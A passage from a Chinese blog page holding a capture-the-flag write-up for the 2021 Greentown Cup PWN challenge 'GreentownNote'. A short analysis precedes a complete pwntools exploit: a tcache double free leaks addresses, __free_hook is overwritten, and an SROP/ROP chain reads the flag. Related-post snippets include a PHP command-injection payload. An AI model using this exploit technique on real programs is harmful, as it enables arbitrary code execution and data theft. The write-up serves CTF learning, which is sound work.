2021年“绿城杯”网络安全大赛-PWN-GreentownNote

最新推荐文章于 2023-06-12 10:05:21 发布
最新推荐文章于 2023-06-12 10:05:21 发布
阅读量481 收藏 5
点赞数 1
分类专栏: 2021年“绿城杯”网络安全大赛 文章标签: 网络安全 linux python 2021年“绿城杯” PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/120559675
版权

2021年“绿城杯”网络安全大赛-PWN-GreentownNote

题目名称:GreentownNote
题目内容:欢迎参加绿城杯~
题目分值:200.0
题目难度:中等
相关附件:GreentownNote的附件3.txt

解题思路:

1.检查保护

在这里插入图片描述

保护全开

2.函数分析

题目只给了add,show,delete
add()
在这里插入图片描述show()
在这里插入图片描述
delete()
在这里插入图片描述

3.思路

(1)首先free泄露libc
(2)构造heap srop
照题目环境2.27,应该是攻击free_hook,把它的值改成set_context+53,而后构造srop链来read flag
exp

#coding=utf-8
from pwn import *
from LibcSearcher import *

#context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'debug'
context(arch='amd64', os='linux')

local = 0

fileName = './GreentownNote'
elfName = fileName
libcName = '/home/pwn/LibcResource/Ubuntu18/libc-2.27.so'

remoteAddress = '82.157.5.28'
remotePort = 50301

if local:
    p = process(fileName)
    elf = ELF(fileName)
    # libc = elf.libc
    libc = ELF(libcName)
else:
    p = remote(remoteAddress, remotePort)
    elf = ELF(elfName)
    libc = ELF(libcName)


def add(size,content):
    p.sendlineafter("choice :","1")
    p.recvuntil(":")
    p.sendline(str(size))
    p.recvuntil(":")
    p.sendline(content)

def show(index):
    p.sendlineafter("choice :",str(2))
    p.recvuntil(":")
    p.sendline(str(index))

def delete(index):
    p.sendlineafter("choice :",str(3))
    p.recvuntil(":")
    p.sendline(str(index))


#---------------------------leak----------------------------#
add(0x100,b'hiphopYYDS')               #0
add(0x100,b'hiphopYYDS')               #1
delete(0)
delete(0)
show(0)


p.recvuntil("t: ")
leak = u64(p.recv(6).ljust(8,b'\x00'))
heap_addr = leak - 0x260


add(0x100,p64(heap_addr+0x10))          #2
add(0x100,'hiphopYYDS')                 #3
add(0x100,'\x07'*0x40)                  #4
delete(3)
show(3)


leak = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - 0x70 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
setcontext = libc.sym['setcontext'] + libc_base +53
syscall = next(libc.search(asm("syscall\nret")))+libc_base


add(0x100,b'\x07'*0x80+p64(free_hook))  #5
add(0x90,p64(setcontext))               #6

#-----------------------HEAP SROP------------------------#
frame = SigreturnFrame()
frame.rsp = (free_hook&0xfffffffffffff000)+8
frame.rax = 0
frame.rdi = 0
frame.rsi = free_hook&0xfffffffffffff000
frame.rdx = 0x2000
frame.rip = syscall


add(0xf8,bytes(frame)[0:0xf8])          #7
delete(5)


#--------------read flag--------------#
payload = ''
payload += p64(next(libc.search(asm('pop rdi\nret')))+libc_base)
payload += p64(free_hook&0xfffffffffffff000)
payload += p64(next(libc.search(asm('pop rsi\nret')))+libc_base)
payload += p64(0)
payload += p64(next(libc.search(asm('pop rdx\nret')))+libc_base)
payload += p64(0)
payload += p64(next(libc.search(asm('pop rax\nret')))+libc_base)
payload += p64(2)
payload += p64(syscall)
payload += p64(next(libc.search(asm('pop rdi\nret')))+libc_base)
payload += p64(3)
payload += p64(next(libc.search(asm('pop rsi\nret')))+libc_base)
payload += p64((free_hook&0xfffffffffffff000)+0x200)
payload += p64(next(libc.search(asm('pop rdx\nret')))+libc_base)
payload += p64(0x30)
payload += p64(next(libc.search(asm('pop rax\nret')))+libc_base)
payload += p64(0)
payload += p64(syscall)
payload += p64(next(libc.search(asm('pop rdi\nret')))+libc_base)
payload += p64(1)
payload += p64(next(libc.search(asm('pop rsi\nret')))+libc_base)
payload += p64((free_hook&0xfffffffffffff000)+0x200)
payload += p64(next(libc.search(asm('pop rdx\nret')))+libc_base)
payload += p64(0x30)
payload += p64(next(libc.search(asm('pop rax\nret')))+libc_base)
payload += p64(1)
payload += p64(syscall)


#--------get flag--------#
payload1='./flag'.ljust(8,b'\x00')+ payload
p.sendline(payload1)
p.interactive()

DASCTF{89ab0b04e7f83c43bc498785651f8d38}

夜白君
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Bugku Crypto rsa wp
shifaziran2007的博客
09-09 910
N : 46065781388428960989637205658554417248531811702624626389974432923749270182062721955600778820059011913617389598900138215153600685382332638289236314360431451868638878600298924880081486124859507532627709964533869497709745916853089877600729369572810197606.
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2450
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021的鹏程比赛的pwn题,题目链接如下:2021-鹏程-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
pwn2021 绿城(部分)
woodwhale的博客
10-04 3551
pwn2021 绿城(部分) 前言 补题,这场没报名,比赛的时候机房唯一报名的战队pwn穿了(tql),就没去做了 1、uaf_pwn 简单的uaf,free之后之后没有置0,直接申请unsorted bin泄露libc,再double free改malloc_hook写入one_gadget exp如下 def add(size): sla(">","1") sla("size>",str(size)) def free(index): sla("&gt
BUU-crypto-刷题记录05
m0_57291352的博客
06-06 304
rsarsa 题目 Math is cool! Use the RSA algorithm to decode the secret message, c, p, q, and e are parameters for the RSA algorithm. p = 96484230290105156765905517400104265349457376392357398006439893520398525072984913995610350091634270503701075707336333509116
2021绿城网络安全大赛-Web-[warmup]ezphp
qq_43264813的博客
09-29 1479
2021绿城网络安全大赛-[warmup]ezphp 题目名称:[warmup]ezphp 题目内容:很简单的一道PHP 题目分值:100.0 题目难度:容易 相关附件:[warmup]ezphp的附件13.txt 解题思路: 1.F12看见提示 flag 2.根据报错提示,知道flag文件的位置。 ./pages/flag.php,以及调用了assert的断言函数 3.那么就可以任意命令执行了。 ?link_page='.system("cat ./pages/flag.php").' .
2021绿城网络安全大赛-PWN-ezuaf
qq_43264813的博客
09-30 315
2021绿城网络安全大赛-PWN-ezuaf 题目名称:ezuaf 题目内容:简单的uaf 题目分值:100.0 题目难度:容易 相关附件:ezuaf的附件24.txt 解题思路: 1.检查保护 2.函数分析 发现Delete中有uaf 3.思路 打malloc_hook exp from pwn import * #io = process('./uaf_pwn') io = remote('82.157.5.28',52402) elf = ELF('./uaf_pwn') libc
2021绿城网络安全大赛
09-30
2021绿城网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
2021绿城pwn部分wp
eeeeeight的博客
09-29 1172
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
2021绿城 RE WP
abelxu
09-29 3300
逆向(100分题) 变异RC4,关键点是密钥盒S的生成过程被魔改了。RC4原理参考之前的博客 基本流程 1.初始循环填充key,key=“tallmewhy” 2.计算密钥盒S,但是不是标准的RC4算法。可以通过dump的方法将密钥和提取 3.ebp+ecx+var_534中是密文 由于不想看魔改的S盒生成算法,所以在S盒生成完成的地方下断点,dump S盒填充就可以了。 exp #include<stdio.h> #include<string.h> struct rc4_
2021绿城网络安全大赛-PWN-null
qq_43264813的博客
09-30 298
2021绿城网络安全大赛-PWN-null 题目名称:null 题目内容:off by… 题目分值:100.0 题目难度:容易 相关附件:null的附件13.txt 解题思路: 1.检查保护 2.函数分析 题目给了四个重要函数,add,delete,edit,show add() delete() edit() show() 3.思路 发现有off by one漏洞,那我们利用off bye one + size错位 exp from pwn import * binary = "./nu
[2021绿城] [Misc] 流量分析 + cobaltstrike 流量解密
ShenZ的博客
03-17 5237
2021绿城网络安全大赛-Misc-流量分析 1.webshell分析 2.解密 cobaltstrike 流量 (1)分析`.cobaltstrike.beacon_keys`得到私钥 (2)通过私钥解密元数据、获取 `AES KEY` (3)解密cs流量 框架是Laravel,利用CVE-2021-3129命令执行写马。 分析发现webshell是/.config.php tcp.stream eq 2509
第五空间网络安全大赛pwn-bountyhunter
CHAWUCIREN1的博客
09-20 391
先运行一下 查看一下保护机制 开启了NX保护 丢入IDApro里面查看一下 查看一下vulnerable_function()函数 栈空间是144,但是可以读入的大小是0X200,常规的栈溢出题目 查看buf栈空间 shift+F12查看字符串 发现system和/bin/sh,构造payload ...
网络安全学习笔记(5)——PWN实践
最新发布
qq_42324049的博客
06-12 364
通过与ASCII码表对照,发现程序的加密逻辑。(在这没什么用,但如果需要逆向分析的话还是有一定的价值)‘shift+f12’,查看是否有flag,/bin/sh,system等关键信息。拿到文件,用步骤1,步骤2进行分析。其他的信息暂时还不了解具体应用场景,后续需要再去学习。NX enabled——开启数据执行防护,不能在栈堆执行shellcode。1.5运行python漏洞利用程序4.py,通过cat flag 命令拿到flag。输入一些数据,了解一下程序大致是干嘛的。通过提示可以大致了解到,这是一个。
长安“战疫“网络安全卫士守护赛--PWN
weixin_51055545的博客
01-09 359
今天早上定了闹钟起来干题,还没怎么睡醒 这里我把前两道pwn题给分析一下 pwn1 例行检查: 32位,没有开canary保护,没有pie,扔到IDA中 buf大小0x38,判断为栈溢出,还有后门,心中正在窃喜,长安这道签到题是真简单呀,但做了之后发现这里main函数最后的返回还应注意一下 调用完read之后,不是leave retn,而是多了一行lea esp ,[ecx-4],这里应注意一下,将ecx-4的地址给了esp,相当于返回到了ecx-4的地址,(注意lea 区别于mov,mov传送的是地址
网络安全入门之 BUUCTF Pwn - test your nc
Curren的博客
07-02 1921
`Pwn`类题目的入门题,我们需要获取目标机上的`flag`密钥。
2022福建移动网络安全大赛:实战CTF竞赛规程详解
2022福建移动网络安全技能大赛是一项由中国移动通信集团福建有限公司主办,福建福诺移动通信技术有限公司、福建信息职业技术学院、福建船政交通职业学院和福建华众互联网科技有限公司共同承办的赛事。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值